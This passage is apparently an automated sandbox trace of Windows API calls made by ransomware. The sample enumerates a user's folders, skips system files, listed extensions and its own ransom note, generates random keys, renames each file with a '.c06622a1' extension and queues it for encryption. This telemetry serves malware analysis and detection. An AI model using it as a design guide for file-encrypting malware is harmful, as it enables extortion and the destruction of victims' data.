ftLastWriteTime.dwHighDateTime=0x1d5dee1, nFileSizeHigh=0x0, nFileSizeLow=0xe5e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="xpRs11.mp3", cAlternateFileName="")) returned 1 [0151.332] _wcsicmp (_Str1="xpRs11.mp3", _Str2="README.c06622a1.TXT") returned 6 [0151.332] wcsstr (_Str="xpRs11.mp3", _SubStr="README") returned 0x0 [0151.333] _wcsicmp (_Str1="autorun.inf", _Str2="xpRs11.mp3") returned -23 [0151.333] wcslen (_String="autorun.inf") returned 0xb [0151.333] _wcsicmp (_Str1="boot.ini", _Str2="xpRs11.mp3") returned -22 [0151.333] wcslen (_String="boot.ini") returned 0x8 [0151.333] _wcsicmp (_Str1="bootfont.bin", _Str2="xpRs11.mp3") returned -22 [0151.333] wcslen (_String="bootfont.bin") returned 0xc [0151.333] _wcsicmp (_Str1="bootsect.bak", _Str2="xpRs11.mp3") returned -22 [0151.333] wcslen (_String="bootsect.bak") returned 0xc [0151.333] _wcsicmp (_Str1="desktop.ini", _Str2="xpRs11.mp3") returned -20 [0151.333] wcslen (_String="desktop.ini") returned 0xb [0151.333] _wcsicmp (_Str1="iconcache.db", _Str2="xpRs11.mp3") returned -15 [0151.333] wcslen (_String="iconcache.db") returned 0xc [0151.333] _wcsicmp (_Str1="ntldr", _Str2="xpRs11.mp3") returned -10 [0151.333] wcslen (_String="ntldr") returned 0x5 [0151.333] _wcsicmp (_Str1="ntuser.dat", _Str2="xpRs11.mp3") returned -10 [0151.333] wcslen (_String="ntuser.dat") returned 0xa [0151.333] _wcsicmp (_Str1="ntuser.dat.log", _Str2="xpRs11.mp3") returned -10 [0151.333] wcslen (_String="ntuser.dat.log") returned 0xe [0151.333] _wcsicmp (_Str1="ntuser.ini", _Str2="xpRs11.mp3") returned -10 [0151.333] wcslen (_String="ntuser.ini") returned 0xa [0151.333] _wcsicmp (_Str1="thumbs.db", _Str2="xpRs11.mp3") returned -4 [0151.333] wcslen (_String="thumbs.db") returned 0x9 [0151.333] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0151.333] wcslen (_String="386") returned 0x3 [0151.333] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0151.333] wcslen (_String="adv") returned 0x3 [0151.333] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0151.333] wcslen (_String="ani") returned 0x3 [0151.333] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0151.333] wcslen (_String="bat") returned 0x3 [0151.333] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0151.333] wcslen (_String="bin") returned 0x3 [0151.333] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0151.333] wcslen (_String="cab") returned 0x3 [0151.333] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0151.333] wcslen (_String="cmd") returned 0x3 [0151.333] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0151.334] wcslen (_String="com") returned 0x3 [0151.334] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0151.334] wcslen (_String="cpl") returned 0x3 [0151.334] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0151.334] wcslen (_String="cur") returned 0x3 [0151.334] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0151.334] wcslen (_String="deskthemepack") returned 0xd [0151.334] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0151.334] wcslen (_String="diagcab") returned 0x7 [0151.334] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0151.334] wcslen (_String="diagcfg") returned 0x7 [0151.334] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0151.334] wcslen (_String="diagpkg") returned 0x7 [0151.334] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0151.334] wcslen (_String="dll") returned 0x3 [0151.334] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0151.334] wcslen (_String="drv") returned 0x3 [0151.334] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0151.334] wcslen (_String="exe") returned 0x3 [0151.334] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0151.334] wcslen (_String="hlp") returned 0x3 [0151.334] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0151.334] wcslen (_String="icl") returned 0x3 [0151.335] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0151.335] wcslen (_String="icns") returned 0x4 [0151.335] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0151.335] wcslen (_String="ico") returned 0x3 [0151.335] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0151.335] wcslen (_String="ics") returned 0x3 [0151.335] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0151.335] wcslen (_String="idx") returned 0x3 [0151.335] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0151.335] wcslen (_String="ldf") returned 0x3 [0151.335] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0151.335] wcslen (_String="lnk") returned 0x3 [0151.335] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0151.335] wcslen (_String="mod") returned 0x3 [0151.335] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0151.335] wcslen (_String="mpa") returned 0x3 [0151.335] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0151.335] wcslen (_String="msc") returned 0x3 [0151.335] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0151.335] wcslen (_String="msp") returned 0x3 [0151.335] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0151.335] wcslen (_String="msstyles") returned 0x8 [0151.335] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0151.335] wcslen (_String="msu") returned 0x3 [0151.335] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0151.335] wcslen (_String="nls") returned 0x3 [0151.335] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0151.335] wcslen (_String="nomedia") returned 0x7 [0151.335] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0151.335] wcslen (_String="ocx") returned 0x3 [0151.335] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0151.335] wcslen (_String="prf") returned 0x3 [0151.335] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0151.335] wcslen (_String="ps1") returned 0x3 [0151.335] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0151.335] wcslen (_String="rom") returned 0x3 [0151.336] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0151.336] wcslen (_String="rtp") returned 0x3 [0151.336] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0151.336] wcslen (_String="scr") returned 0x3 [0151.336] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0151.336] wcslen (_String="shs") returned 0x3 [0151.336] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0151.336] wcslen (_String="spl") returned 0x3 [0151.336] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0151.336] wcslen (_String="sys") returned 0x3 [0151.336] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0151.336] wcslen (_String="theme") returned 0x5 [0151.336] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0151.336] wcslen (_String="themepack") returned 0x9 [0151.336] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0151.336] wcslen (_String="wpx") returned 0x3 [0151.336] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0151.336] wcslen (_String="lock") returned 0x4 [0151.336] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0151.336] wcslen (_String="key") returned 0x3 [0151.336] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0151.336] wcslen (_String="hta") returned 0x3 [0151.336] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0151.336] wcslen (_String="msi") returned 0x3 [0151.336] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0151.336] wcslen (_String="pdb") returned 0x3 [0151.336] _wcsicmp (_Str1="sql", _Str2="mp3") returned 6 [0151.336] wcslen (_String="sql") returned 0x3 [0151.336] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0151.336] wcslen (_String="sqlite") returned 0x6 [0151.336] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc")) returned 0x10 [0151.336] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0151.336] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC" [0151.337] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC") returned 0x2e [0151.337] wcscpy (in: _Dest=0x45000ee, _Source="xpRs11.mp3" | out: _Dest="xpRs11.mp3") returned="xpRs11.mp3" [0151.337] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\xpRs11.mp3", dwFileAttributes=0x80) returned 1 [0151.337] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\xpRs11.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\xprs11.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x674 [0151.337] SetFilePointerEx (in: hFile=0x674, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.337] ReadFile (in: hFile=0x674, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0151.338] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xb20c148d [0151.338] RtlComputeCrc32 (PartialCrc=0x148d, Buffer=0x3fe8f4, Length=0x80) returned 0xad802447 [0151.338] RtlComputeCrc32 (PartialCrc=0x2447, Buffer=0x3fe8f4, Length=0x80) returned 0x88fef5c7 [0151.338] RtlComputeCrc32 (PartialCrc=0xf5c7, Buffer=0x3fe8f4, Length=0x80) returned 0xe5cf3507 [0151.338] RtlComputeCrc32 (PartialCrc=0x3507, Buffer=0x3fe8f4, Length=0x80) returned 0x9fa40f04 [0151.338] CloseHandle (hObject=0x674) returned 1 [0151.338] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0151.338] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\xpRs11.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\xpRs11.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\xpRs11.mp3" [0151.338] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\xpRs11.mp3") returned 0x39 [0151.338] wcscpy (in: _Dest=0x451010a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0151.338] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\xpRs11.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\xprs11.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\xpRs11.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\xprs11.mp3.c06622a1"), dwFlags=0x8) returned 1 [0151.341] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z3-tnC\\xpRs11.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z3-tnc\\xprs11.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x674 [0151.341] CreateIoCompletionPort (FileHandle=0x674, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0151.341] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x41f0020 [0151.346] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x262d2ae1 [0151.346] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x28cf4868 [0151.346] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5c0cc73e [0151.346] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4d635918 [0151.346] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1053197e [0151.346] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x33275af1 [0151.346] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6535d7ce [0151.346] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x66e166b5 [0151.349] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x41f0094, Length=0x80) returned 0xdf49c132 [0151.349] RtlComputeCrc32 (PartialCrc=0xc132, Buffer=0x41f0094, Length=0x80) returned 0xedb9bc8d [0151.349] RtlComputeCrc32 (PartialCrc=0xbc8d, Buffer=0x41f0094, Length=0x80) returned 0x7e3bee4e [0151.349] RtlComputeCrc32 (PartialCrc=0xee4e, Buffer=0x41f0094, Length=0x80) returned 0x7c28a7c9 [0151.350] RtlComputeCrc32 (PartialCrc=0xa7c9, Buffer=0x41f0094, Length=0x80) returned 0xb0454f18 [0151.350] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0151.350] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0151.350] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0151.350] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0151.350] FindClose (in: hFindFile=0x2db8780 | out: hFindFile=0x2db8780) returned 1 [0151.350] _wcsicmp (_Str1="backup", _Str2="z3-tnC") returned -24 [0151.350] wcslen (_String="backup") returned 0x6 [0151.350] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0151.350] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0151.350] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0151.350] FindClose (in: hFindFile=0x2db8740 | out: hFindFile=0x2db8740) returned 1 [0151.350] _wcsicmp (_Str1="backup", _Str2="Music") returned -11 [0151.350] wcslen (_String="backup") returned 0x6 [0151.350] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44a0060) returned 1 [0151.351] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0151.352] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0151.352] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0151.352] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0151.352] _wcsicmp (_Str1="NTUSER.DAT", _Str2="README.c06622a1.TXT") returned -4 [0151.352] wcsstr (_Str="NTUSER.DAT", _SubStr="README") returned 0x0 [0151.352] _wcsicmp (_Str1="autorun.inf", _Str2="NTUSER.DAT") returned -13 [0151.352] wcslen (_String="autorun.inf") returned 0xb [0151.352] _wcsicmp (_Str1="boot.ini", _Str2="NTUSER.DAT") returned -12 [0151.352] wcslen (_String="boot.ini") returned 0x8 [0151.352] _wcsicmp (_Str1="bootfont.bin", _Str2="NTUSER.DAT") returned -12 [0151.352] wcslen (_String="bootfont.bin") returned 0xc [0151.352] _wcsicmp (_Str1="bootsect.bak", _Str2="NTUSER.DAT") returned -12 [0151.352] wcslen (_String="bootsect.bak") returned 0xc [0151.352] _wcsicmp (_Str1="desktop.ini", _Str2="NTUSER.DAT") returned -10 [0151.352] wcslen (_String="desktop.ini") returned 0xb [0151.352] _wcsicmp (_Str1="iconcache.db", _Str2="NTUSER.DAT") returned -5 [0151.352] wcslen (_String="iconcache.db") returned 0xc [0151.352] _wcsicmp (_Str1="ntldr", _Str2="NTUSER.DAT") returned -9 [0151.352] wcslen (_String="ntldr") returned 0x5 [0151.352] _wcsicmp (_Str1="ntuser.dat", _Str2="NTUSER.DAT") returned 0 [0151.352] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8f389c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0151.352] _wcsicmp (_Str1="ntuser.dat.LOG1", _Str2="README.c06622a1.TXT") returned -4 [0151.352] wcsstr (_Str="ntuser.dat.LOG1", _SubStr="README") returned 0x0 [0151.352] _wcsicmp (_Str1="autorun.inf", _Str2="ntuser.dat.LOG1") returned -13 [0151.352] wcslen (_String="autorun.inf") returned 0xb [0151.352] _wcsicmp (_Str1="boot.ini", _Str2="ntuser.dat.LOG1") returned -12 [0151.352] wcslen (_String="boot.ini") returned 0x8 [0151.352] _wcsicmp (_Str1="bootfont.bin", _Str2="ntuser.dat.LOG1") returned -12 [0151.353] wcslen (_String="bootfont.bin") returned 0xc [0151.353] _wcsicmp (_Str1="bootsect.bak", _Str2="ntuser.dat.LOG1") returned -12 [0151.353] wcslen (_String="bootsect.bak") returned 0xc [0151.353] _wcsicmp (_Str1="desktop.ini", _Str2="ntuser.dat.LOG1") returned -10 [0151.353] wcslen (_String="desktop.ini") returned 0xb [0151.353] _wcsicmp (_Str1="iconcache.db", _Str2="ntuser.dat.LOG1") returned -5 [0151.353] wcslen (_String="iconcache.db") returned 0xc [0151.353] _wcsicmp (_Str1="ntldr", _Str2="ntuser.dat.LOG1") returned -9 [0151.353] wcslen (_String="ntldr") returned 0x5 [0151.353] _wcsicmp (_Str1="ntuser.dat", _Str2="ntuser.dat.LOG1") returned -46 [0151.353] wcslen (_String="ntuser.dat") returned 0xa [0151.353] _wcsicmp (_Str1="ntuser.dat.log", _Str2="ntuser.dat.LOG1") returned -49 [0151.353] wcslen (_String="ntuser.dat.log") returned 0xe [0151.353] _wcsicmp (_Str1="ntuser.ini", _Str2="ntuser.dat.LOG1") returned 5 [0151.353] wcslen (_String="ntuser.ini") returned 0xa [0151.353] _wcsicmp (_Str1="thumbs.db", _Str2="ntuser.dat.LOG1") returned 6 [0151.353] wcslen (_String="thumbs.db") returned 0x9 [0151.353] _wcsicmp (_Str1="386", _Str2="LOG1") returned -57 [0151.353] wcslen (_String="386") returned 0x3 [0151.353] _wcsicmp (_Str1="adv", _Str2="LOG1") returned -11 [0151.353] wcslen (_String="adv") returned 0x3 [0151.353] _wcsicmp (_Str1="ani", _Str2="LOG1") returned -11 [0151.353] wcslen (_String="ani") returned 0x3 [0151.353] _wcsicmp (_Str1="bat", _Str2="LOG1") returned -10 [0151.353] wcslen (_String="bat") returned 0x3 [0151.353] _wcsicmp (_Str1="bin", _Str2="LOG1") returned -10 [0151.353] wcslen (_String="bin") returned 0x3 [0151.353] _wcsicmp (_Str1="cab", _Str2="LOG1") returned -9 [0151.353] wcslen (_String="cab") returned 0x3 [0151.353] _wcsicmp (_Str1="cmd", _Str2="LOG1") returned -9 [0151.353] wcslen (_String="cmd") returned 0x3 [0151.353] _wcsicmp (_Str1="com", _Str2="LOG1") returned -9 [0151.353] wcslen (_String="com") returned 0x3 [0151.353] _wcsicmp (_Str1="cpl", _Str2="LOG1") returned -9 [0151.353] wcslen (_String="cpl") returned 0x3 [0151.353] _wcsicmp (_Str1="cur", _Str2="LOG1") returned -9 [0151.353] wcslen (_String="cur") returned 0x3 [0151.354] _wcsicmp (_Str1="deskthemepack", _Str2="LOG1") returned -8 [0151.354] wcslen (_String="deskthemepack") returned 0xd [0151.354] _wcsicmp (_Str1="diagcab", _Str2="LOG1") returned -8 [0151.354] wcslen (_String="diagcab") returned 0x7 [0151.354] _wcsicmp (_Str1="diagcfg", _Str2="LOG1") returned -8 [0151.354] wcslen (_String="diagcfg") returned 0x7 [0151.354] _wcsicmp (_Str1="diagpkg", _Str2="LOG1") returned -8 [0151.354] wcslen (_String="diagpkg") returned 0x7 [0151.354] _wcsicmp (_Str1="dll", _Str2="LOG1") returned -8 [0151.354] wcslen (_String="dll") returned 0x3 [0151.354] _wcsicmp (_Str1="drv", _Str2="LOG1") returned -8 [0151.354] wcslen (_String="drv") returned 0x3 [0151.354] _wcsicmp (_Str1="exe", _Str2="LOG1") returned -7 [0151.354] wcslen (_String="exe") returned 0x3 [0151.354] _wcsicmp (_Str1="hlp", _Str2="LOG1") returned -4 [0151.354] wcslen (_String="hlp") returned 0x3 [0151.354] _wcsicmp (_Str1="icl", _Str2="LOG1") returned -3 [0151.354] wcslen (_String="icl") returned 0x3 [0151.354] _wcsicmp (_Str1="icns", _Str2="LOG1") returned -3 [0151.354] wcslen (_String="icns") returned 0x4 [0151.354] _wcsicmp (_Str1="ico", _Str2="LOG1") returned -3 [0151.354] wcslen (_String="ico") returned 0x3 [0151.354] _wcsicmp (_Str1="ics", _Str2="LOG1") returned -3 [0151.354] wcslen (_String="ics") returned 0x3 [0151.354] _wcsicmp (_Str1="idx", _Str2="LOG1") returned -3 [0151.354] wcslen (_String="idx") returned 0x3 [0151.354] _wcsicmp (_Str1="ldf", _Str2="LOG1") returned -11 [0151.354] wcslen (_String="ldf") returned 0x3 [0151.354] _wcsicmp (_Str1="lnk", _Str2="LOG1") returned -1 [0151.354] wcslen (_String="lnk") returned 0x3 [0151.354] _wcsicmp (_Str1="mod", _Str2="LOG1") returned 1 [0151.354] wcslen (_String="mod") returned 0x3 [0151.354] _wcsicmp (_Str1="mpa", _Str2="LOG1") returned 1 [0151.354] wcslen (_String="mpa") returned 0x3 [0151.354] _wcsicmp (_Str1="msc", _Str2="LOG1") returned 1 [0151.354] wcslen (_String="msc") returned 0x3 [0151.354] _wcsicmp (_Str1="msp", _Str2="LOG1") returned 1 [0151.355] wcslen (_String="msp") returned 0x3 [0151.355] _wcsicmp (_Str1="msstyles", _Str2="LOG1") returned 1 [0151.355] wcslen (_String="msstyles") returned 0x8 [0151.355] _wcsicmp (_Str1="msu", _Str2="LOG1") returned 1 [0151.355] wcslen (_String="msu") returned 0x3 [0151.355] _wcsicmp (_Str1="nls", _Str2="LOG1") returned 2 [0151.355] wcslen (_String="nls") returned 0x3 [0151.355] _wcsicmp (_Str1="nomedia", _Str2="LOG1") returned 2 [0151.355] wcslen (_String="nomedia") returned 0x7 [0151.355] _wcsicmp (_Str1="ocx", _Str2="LOG1") returned 3 [0151.355] wcslen (_String="ocx") returned 0x3 [0151.355] _wcsicmp (_Str1="prf", _Str2="LOG1") returned 4 [0151.355] wcslen (_String="prf") returned 0x3 [0151.355] _wcsicmp (_Str1="ps1", _Str2="LOG1") returned 4 [0151.355] wcslen (_String="ps1") returned 0x3 [0151.355] _wcsicmp (_Str1="rom", _Str2="LOG1") returned 6 [0151.355] wcslen (_String="rom") returned 0x3 [0151.355] _wcsicmp (_Str1="rtp", _Str2="LOG1") returned 6 [0151.355] wcslen (_String="rtp") returned 0x3 [0151.355] _wcsicmp (_Str1="scr", _Str2="LOG1") returned 7 [0151.355] wcslen (_String="scr") returned 0x3 [0151.355] _wcsicmp (_Str1="shs", _Str2="LOG1") returned 7 [0151.355] wcslen (_String="shs") returned 0x3 [0151.355] _wcsicmp (_Str1="spl", _Str2="LOG1") returned 7 [0151.355] wcslen (_String="spl") returned 0x3 [0151.355] _wcsicmp (_Str1="sys", _Str2="LOG1") returned 7 [0151.355] wcslen (_String="sys") returned 0x3 [0151.355] _wcsicmp (_Str1="theme", _Str2="LOG1") returned 8 [0151.355] wcslen (_String="theme") returned 0x5 [0151.355] _wcsicmp (_Str1="themepack", _Str2="LOG1") returned 8 [0151.355] wcslen (_String="themepack") returned 0x9 [0151.355] _wcsicmp (_Str1="wpx", _Str2="LOG1") returned 11 [0151.355] wcslen (_String="wpx") returned 0x3 [0151.355] _wcsicmp (_Str1="lock", _Str2="LOG1") returned -4 [0151.355] wcslen (_String="lock") returned 0x4 [0151.355] _wcsicmp (_Str1="key", _Str2="LOG1") returned -1 [0151.356] wcslen (_String="key") returned 0x3 [0151.356] _wcsicmp (_Str1="hta", _Str2="LOG1") returned -4 [0151.356] wcslen (_String="hta") returned 0x3 [0151.356] _wcsicmp (_Str1="msi", _Str2="LOG1") returned 1 [0151.356] wcslen (_String="msi") returned 0x3 [0151.356] _wcsicmp (_Str1="pdb", _Str2="LOG1") returned 4 [0151.356] wcslen (_String="pdb") returned 0x3 [0151.356] _wcsicmp (_Str1="sql", _Str2="LOG1") returned 7 [0151.356] wcslen (_String="sql") returned 0x3 [0151.356] _wcsicmp (_Str1="sqlite", _Str2="LOG1") returned 7 [0151.356] wcslen (_String="sqlite") returned 0x6 [0151.356] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz")) returned 0x10 [0151.356] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44a0060 [0151.356] wcscpy (in: _Dest=0x44a0060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" [0151.356] wcslen 